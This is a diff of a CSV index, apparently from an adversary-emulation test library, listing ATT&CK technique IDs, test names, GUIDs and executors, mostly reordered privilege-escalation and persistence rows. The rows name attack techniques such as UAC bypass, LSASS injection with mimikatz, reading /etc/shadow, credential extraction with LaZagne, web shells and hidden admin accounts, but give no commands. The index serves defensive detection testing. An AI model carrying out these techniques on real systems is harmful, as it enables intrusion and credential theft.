
Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt -privilege-escalation,T1134.004,Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell -privilege-escalation,T1134.004,Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell -privilege-escalation,T1134.004,Parent PID Spoofing,3,Parent PID Spoofing - Spawn from Specified Process,cbbff285-9051-444a-9d17-c07cd2d230eb,powershell -privilege-escalation,T1134.004,Parent PID Spoofing,4,Parent PID Spoofing - Spawn from svchost.exe,e9f2b777-3123-430b-805d-5cedc66ab591,powershell -privilege-escalation,T1134.004,Parent PID Spoofing,5,Parent PID Spoofing - Spawn from New Process,2988133e-561c-4e42-a15f-6281e6a9b2db,powershell -privilege-escalation,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt -privilege-escalation,T1547.011,Plist Modification,1,Plist Modification,394a538e-09bb-4a4a-95d1-b93cf12682a8,manual -privilege-escalation,T1547.010,Port Monitors,1,Add Port Monitor persistence in Registry,d34ef297-f178-4462-871e-9ce618d44e50,command_prompt -privilege-escalation,T1546.013,PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell -privilege-escalation,T1055.012,Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell -privilege-escalation,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell -privilege-escalation,T1055,Process Injection,1,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell -privilege-escalation,T1055,Process Injection,2,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt -privilege-escalation,T1037.004,Rc.common,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash 
-privilege-escalation,T1547.007,Re-opened Applications,1,Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,manual -privilege-escalation,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh -privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,1,Reg Key Run,e55be3fd-3521-4610-9d1a-e210e42dcf05,command_prompt -privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,2,Reg Key RunOnce,554cbd88-cde1-4b56-8168-0be552eed9eb,command_prompt -privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,3,PowerShell Registry RunOnce,eb44f842-0457-4ddc-9b92-c4caa144ac42,powershell -privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,4,Suspicious vbs file run from startup Folder,2cb98256-625e-4da9-9d44-f2e5f90b8bd5,powershell -privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,5,Suspicious jse file run from startup Folder,dade9447-791e-4c8f-b04b-3a35855dfa06,powershell -privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,6,Suspicious bat file run from startup Folder,5b6768e4-44d2-44f0-89da-a01d1430fd5e,powershell -privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,7,Add Executable Shortcut Link to User Startup Folder,24e55612-85f6-4bd6-ae74-a73d02e3441d,powershell -privilege-escalation,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt -privilege-escalation,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt -privilege-escalation,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt -privilege-escalation,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd,powershell -privilege-escalation,T1053.005,Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell -privilege-escalation,T1053.005,Scheduled Task,6,WMI 
Invoke-CimMethod Scheduled Task,e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b,powershell -privilege-escalation,T1546.002,Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt -privilege-escalation,T1547.005,Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell -privilege-escalation,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell -privilege-escalation,T1574.011,Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt -privilege-escalation,T1548.001,Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh -privilege-escalation,T1548.001,Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh -privilege-escalation,T1548.001,Setuid and Setgid,3,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh -privilege-escalation,T1547.009,Shortcut Modification,1,Shortcut Modification,ce4fc678-364f-4282-af16-2fb4c78005ce,command_prompt -privilege-escalation,T1547.009,Shortcut Modification,2,Create shortcut to cmd in startup folders,cfdc954d-4bb0-4027-875b-a1893ce406f2,powershell -privilege-escalation,T1037.005,Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh -privilege-escalation,T1548.003,Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh -privilege-escalation,T1548.003,Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh -privilege-escalation,T1548.003,Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh -privilege-escalation,T1543.002,Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash -privilege-escalation,T1053.006,Systemd Timers,1,Create Systemd 
Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash -privilege-escalation,T1134.001,Token Impersonation/Theft,1,Named pipe client impersonation,90db9e27-8e7c-4c04-b602-a45927884966,powershell -privilege-escalation,T1134.001,Token Impersonation/Theft,2,`SeDebugPrivilege` token duplication,34f0a430-9d04-4d98-bcb5-1989f14719f0,powershell -privilege-escalation,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh -privilege-escalation,T1546.003,Windows Management Instrumentation Event Subscription,1,Persistence via WMI Event Subscription,3c64f177-28e2-49eb-a799-d767b24dd1e0,powershell -privilege-escalation,T1543.003,Windows Service,1,Modify Fax service to run PowerShell,ed366cde-7d12-49df-a833-671904770b9f,command_prompt -privilege-escalation,T1543.003,Windows Service,2,Service Installation CMD,981e2942-e433-44e9-afc1-8c957a1496b6,command_prompt -privilege-escalation,T1543.003,Windows Service,3,Service Installation PowerShell,491a4af6-a521-4b74-b23b-f7b3f1ee9e77,powershell -privilege-escalation,T1547.004,Winlogon Helper DLL,1,Winlogon Shell Key Persistence - PowerShell,bf9f9d65-ee4d-4c3e-a843-777d04f19c38,powershell -privilege-escalation,T1547.004,Winlogon Helper DLL,2,Winlogon Userinit Key Persistence - PowerShell,fb32c935-ee2e-454b-8fa3-1c46b42e8dfb,powershell -privilege-escalation,T1547.004,Winlogon Helper DLL,3,Winlogon Notify Key Logon Persistence - PowerShell,d40da266-e073-4e5a-bb8b-2b385023e5f9,powershell -persistence,T1546.004,.bash_profile and .bashrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh -persistence,T1546.004,.bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh -persistence,T1546.008,Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell -persistence,T1546.008,Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt 
-persistence,T1098,Account Manipulation,1,Admin Account Manipulate,5598f7cb-cf43-455e-883a-f6008c5d46af,powershell -persistence,T1098,Account Manipulation,2,Domain Account and Group Manipulate,a55a22e9-a3d3-42ce-bd48-2653adb8f7a9,powershell -persistence,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt -persistence,T1546.011,Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt -persistence,T1546.011,Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell -persistence,T1546.011,Application Shimming,3,Registry key creation and/or modification events for SDB,9b6a06f9-ab5e-4e8d-8289-1df4289db02f,powershell -persistence,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh -persistence,T1053.002,At (Windows),1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt -persistence,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6712864d7421,command_prompt -persistence,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell -persistence,T1197,BITS Jobs,3,"Persist, Download, & Execute",62a06ec5-5754-47d2-bcfc-123d8314c6ae,command_prompt -persistence,T1197,BITS Jobs,4,Bits download using desktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt -persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual -persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual -persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual -persistence,T1176,Browser Extensions,4,Edge Chromium Addon - VPN,3d456e2b-a7db-4af8-b5b3-720e7c4d9da5,manual -persistence,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell 
-persistence,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell -persistence,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell -persistence,T1546.001,Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt -persistence,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash -persistence,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash -persistence,T1053.003,Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash -persistence,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt -persistence,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt -persistence,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt -persistence,T1136.002,Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt -persistence,T1136.002,Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt -persistence,T1136.002,Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell -persistence,T1546.014,Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh -persistence,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell -persistence,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt 
-persistence,T1546.012,Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt -persistence,T1547.006,Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash -persistence,T1574.006,LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash -persistence,T1574.006,LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash -persistence,T1543.001,Launch Agent,1,Launch Agent,a5983dee-bf6c-4eaf-951c-dbc1a7b90900,bash -persistence,T1543.004,Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash -persistence,T1053.004,Launchd,1,Event Monitor Daemon Persistence,11979f23-9b9d-482a-9935-6fc9cd022c3e,bash -persistence,T1136.001,Local Account,1,Create a user account on a Linux system,40d8eabd-e394-46f6-8785-b9bfa1d011d2,bash -persistence,T1136.001,Local Account,2,Create a user account on a MacOS system,01993ba5-1da3-4e15-a719-b690d4f0f0b2,bash -persistence,T1136.001,Local Account,3,Create a new user in a command prompt,6657864e-0323-4206-9344-ac9cd7265a4f,command_prompt -persistence,T1136.001,Local Account,4,Create a new user in PowerShell,bc8be0ac-475c-4fbf-9b1d-9fffd77afbde,powershell -persistence,T1136.001,Local Account,5,Create a new user in Linux with `root` UID and GID.,a1040a30-d28b-4eda-bd99-bb2861a4616c,bash -persistence,T1136.001,Local Account,6,Create a new Windows admin user,fda74566-a604-4581-a4cc-fbbe21d66559,command_prompt -persistence,T1078.003,Local Accounts,1,Create local account with admin priviliges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt -persistence,T1037.002,Logon Script (Mac),1,Logon Scripts - Mac,f047c7de-a2d9-406e-a62b-12a09d9516f4,manual -persistence,T1037.001,Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt -persistence,T1546.007,Netsh Helper DLL,1,Netsh Helper DLL 
Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt -persistence,T1137,Office Application Startup,1,Office Application Startup - Outlook as a C2,bfe6ac15-c50b-4c4f-a186-0fc6b8ba936c,command_prompt -persistence,T1137.002,Office Test,1,Office Application Startup Test Persistence,c3e35b58-fe1c-480b-b540-7600fb612563,command_prompt -persistence,T1137.004,Outlook Home Page,1,Install Outlook Home Page Persistence,7a91ad51-e6d2-4d43-9471-f26362f5738e,command_prompt -persistence,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt -persistence,T1547.011,Plist Modification,1,Plist Modification,394a538e-09bb-4a4a-95d1-b93cf12682a8,manual -persistence,T1547.010,Port Monitors,1,Add Port Monitor persistence in Registry,d34ef297-f178-4462-871e-9ce618d44e50,command_prompt -persistence,T1546.013,PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell -persistence,T1037.004,Rc.common,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash -persistence,T1547.007,Re-opened Applications,1,Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,manual -persistence,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh -persistence,T1547.001,Registry Run Keys / Startup Folder,1,Reg Key Run,e55be3fd-3521-4610-9d1a-e210e42dcf05,command_prompt -persistence,T1547.001,Registry Run Keys / Startup Folder,2,Reg Key RunOnce,554cbd88-cde1-4b56-8168-0be552eed9eb,command_prompt -persistence,T1547.001,Registry Run Keys / Startup Folder,3,PowerShell Registry RunOnce,eb44f842-0457-4ddc-9b92-c4caa144ac42,powershell -persistence,T1547.001,Registry Run Keys / Startup Folder,4,Suspicious vbs file run from startup Folder,2cb98256-625e-4da9-9d44-f2e5f90b8bd5,powershell -persistence,T1547.001,Registry Run Keys / Startup Folder,5,Suspicious jse file run from startup 
Folder,dade9447-791e-4c8f-b04b-3a35855dfa06,powershell -persistence,T1547.001,Registry Run Keys / Startup Folder,6,Suspicious bat file run from startup Folder,5b6768e4-44d2-44f0-89da-a01d1430fd5e,powershell -persistence,T1547.001,Registry Run Keys / Startup Folder,7,Add Executable Shortcut Link to User Startup Folder,24e55612-85f6-4bd6-ae74-a73d02e3441d,powershell -persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,bash -persistence,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt -persistence,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt -persistence,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt -persistence,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd,powershell -persistence,T1053.005,Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell -persistence,T1053.005,Scheduled Task,6,WMI Invoke-CimMethod Scheduled Task,e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b,powershell -persistence,T1546.002,Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt -persistence,T1547.005,Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell -persistence,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell -persistence,T1574.011,Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt -persistence,T1547.009,Shortcut Modification,1,Shortcut Modification,ce4fc678-364f-4282-af16-2fb4c78005ce,command_prompt -persistence,T1547.009,Shortcut Modification,2,Create shortcut to cmd in startup 
folders,cfdc954d-4bb0-4027-875b-a1893ce406f2,powershell -persistence,T1037.005,Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh -persistence,T1543.002,Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash -persistence,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash -persistence,T1505.002,Transport Agent,1,Install MS Exchange Transport Agent Persistence,43e92449-ff60-46e9-83a3-1a38089df94d,powershell -persistence,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh -persistence,T1505.003,Web Shell,1,Web Shell Written to Disk,0a2ce662-1efa-496f-a472-2fe7b080db16,command_prompt -persistence,T1546.003,Windows Management Instrumentation Event Subscription,1,Persistence via WMI Event Subscription,3c64f177-28e2-49eb-a799-d767b24dd1e0,powershell -persistence,T1543.003,Windows Service,1,Modify Fax service to run PowerShell,ed366cde-7d12-49df-a833-671904770b9f,command_prompt -persistence,T1543.003,Windows Service,2,Service Installation CMD,981e2942-e433-44e9-afc1-8c957a1496b6,command_prompt -persistence,T1543.003,Windows Service,3,Service Installation PowerShell,491a4af6-a521-4b74-b23b-f7b3f1ee9e77,powershell -persistence,T1547.004,Winlogon Helper DLL,1,Winlogon Shell Key Persistence - PowerShell,bf9f9d65-ee4d-4c3e-a843-777d04f19c38,powershell -persistence,T1547.004,Winlogon Helper DLL,2,Winlogon Userinit Key Persistence - PowerShell,fb32c935-ee2e-454b-8fa3-1c46b42e8dfb,powershell -persistence,T1547.004,Winlogon Helper DLL,3,Winlogon Notify Key Logon Persistence - PowerShell,d40da266-e073-4e5a-bb8b-2b385023e5f9,powershell credential-access,T1003.008,/etc/passwd and /etc/shadow,1,Access /etc/shadow (Local),3723ab77-c546-403c-8fb4-bb577033b235,bash credential-access,T1003.008,/etc/passwd and /etc/shadow,2,Access /etc/passwd (Local),60e860b6-8ae6-49db-ad07-5e73edd88f5d,sh credential-access,T1552.003,Bash History,1,Search Through Bash 
History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh +credential-access,T1552.007,Container API,1,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash credential-access,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell credential-access,T1552.001,Credentials In Files,1,Extract Browser and System credentials with LaZagne,9e507bb8-1d30-4e3b-a49b-cb5727d7ea79,bash credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh 
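Review bot: the only net addition in this hunk is the single row `+credential-access,T1552.007,Container API,1,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash`; everything else is the wholesale deletion of the privilege-escalation and persistence rows (from `Netsh Helper DLL Registration` through the three `Winlogon Helper DLL` tests), whose GUIDs reappear unchanged as `+` rows in the later hunks. That makes this a reordering of tactic sections rather than a removal of tests, but a reader of the diff cannot tell without cross-checking GUIDs. Suggest the generator emit the CSV in a fixed tactic order so that a regeneration does not churn several hundred rows around one new test, and that the new Container API row be called out explicitly in the change description.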
@@ -292,6 +100,105 @@ collection,T1113,Screen Capture,2,Screencapture (silent),deb7d358-5fbd-4dc4-aecc collection,T1113,Screen Capture,3,X Windows Capture,8206dd0c-faf6-4d74-ba13-7fbe13dce6ac,bash collection,T1113,Screen Capture,4,Capture Linux Desktop using Import Tool,9cd1cccb-91e4-4550-9139-e20a586fcea1,bash collection,T1113,Screen Capture,5,Windows Screencapture,3c898f62-626c-47d5-aad2-6de873d69153,powershell +privilege-escalation,T1546.008,Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell +privilege-escalation,T1546.008,Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt +privilege-escalation,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt +privilege-escalation,T1546.011,Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt +privilege-escalation,T1546.011,Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell +privilege-escalation,T1546.011,Application Shimming,3,Registry key creation and/or modification events for SDB,9b6a06f9-ab5e-4e8d-8289-1df4289db02f,powershell +privilege-escalation,T1055.004,Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt +privilege-escalation,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh +privilege-escalation,T1053.002,At (Windows),1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt +privilege-escalation,T1548.002,Bypass User Account Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt +privilege-escalation,T1548.002,Bypass User Account Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell 
+privilege-escalation,T1548.002,Bypass User Account Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt +privilege-escalation,T1548.002,Bypass User Account Control,4,Bypass UAC using Fodhelper - PowerShell,3f627297-6c38-4e7d-a278-fc2563eaaeaa,powershell +privilege-escalation,T1548.002,Bypass User Account Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell +privilege-escalation,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt +privilege-escalation,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell +privilege-escalation,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt +privilege-escalation,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell +privilege-escalation,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell +privilege-escalation,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell +privilege-escalation,T1546.001,Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt +privilege-escalation,T1053.007,Container Orchestration Job,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash +privilege-escalation,T1053.007,Container Orchestration Job,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash +privilege-escalation,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash +privilege-escalation,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash +privilege-escalation,T1053.003,Cron,3,Cron - Add script to /var/spool/cron/crontabs/ 
folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash +privilege-escalation,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt +privilege-escalation,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt +privilege-escalation,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt +privilege-escalation,T1574.006,Dynamic Linker Hijacking,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash +privilege-escalation,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash +privilege-escalation,T1055.001,Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell +privilege-escalation,T1546.014,Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh +privilege-escalation,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt +privilege-escalation,T1546.012,Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt +privilege-escalation,T1547.006,Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash +privilege-escalation,T1543.001,Launch Agent,1,Launch Agent,a5983dee-bf6c-4eaf-951c-dbc1a7b90900,bash +privilege-escalation,T1543.004,Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash +privilege-escalation,T1053.004,Launchd,1,Event Monitor Daemon Persistence,11979f23-9b9d-482a-9935-6fc9cd022c3e,bash +privilege-escalation,T1078.003,Local Accounts,1,Create local account with admin priviliges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt 
+privilege-escalation,T1037.002,Logon Script (Mac),1,Logon Scripts - Mac,f047c7de-a2d9-406e-a62b-12a09d9516f4,manual +privilege-escalation,T1037.001,Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt +privilege-escalation,T1546.007,Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt +privilege-escalation,T1134.004,Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell +privilege-escalation,T1134.004,Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell +privilege-escalation,T1134.004,Parent PID Spoofing,3,Parent PID Spoofing - Spawn from Specified Process,cbbff285-9051-444a-9d17-c07cd2d230eb,powershell +privilege-escalation,T1134.004,Parent PID Spoofing,4,Parent PID Spoofing - Spawn from svchost.exe,e9f2b777-3123-430b-805d-5cedc66ab591,powershell +privilege-escalation,T1134.004,Parent PID Spoofing,5,Parent PID Spoofing - Spawn from New Process,2988133e-561c-4e42-a15f-6281e6a9b2db,powershell +privilege-escalation,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt +privilege-escalation,T1547.011,Plist Modification,1,Plist Modification,394a538e-09bb-4a4a-95d1-b93cf12682a8,manual +privilege-escalation,T1547.010,Port Monitors,1,Add Port Monitor persistence in Registry,d34ef297-f178-4462-871e-9ce618d44e50,command_prompt +privilege-escalation,T1546.013,PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell 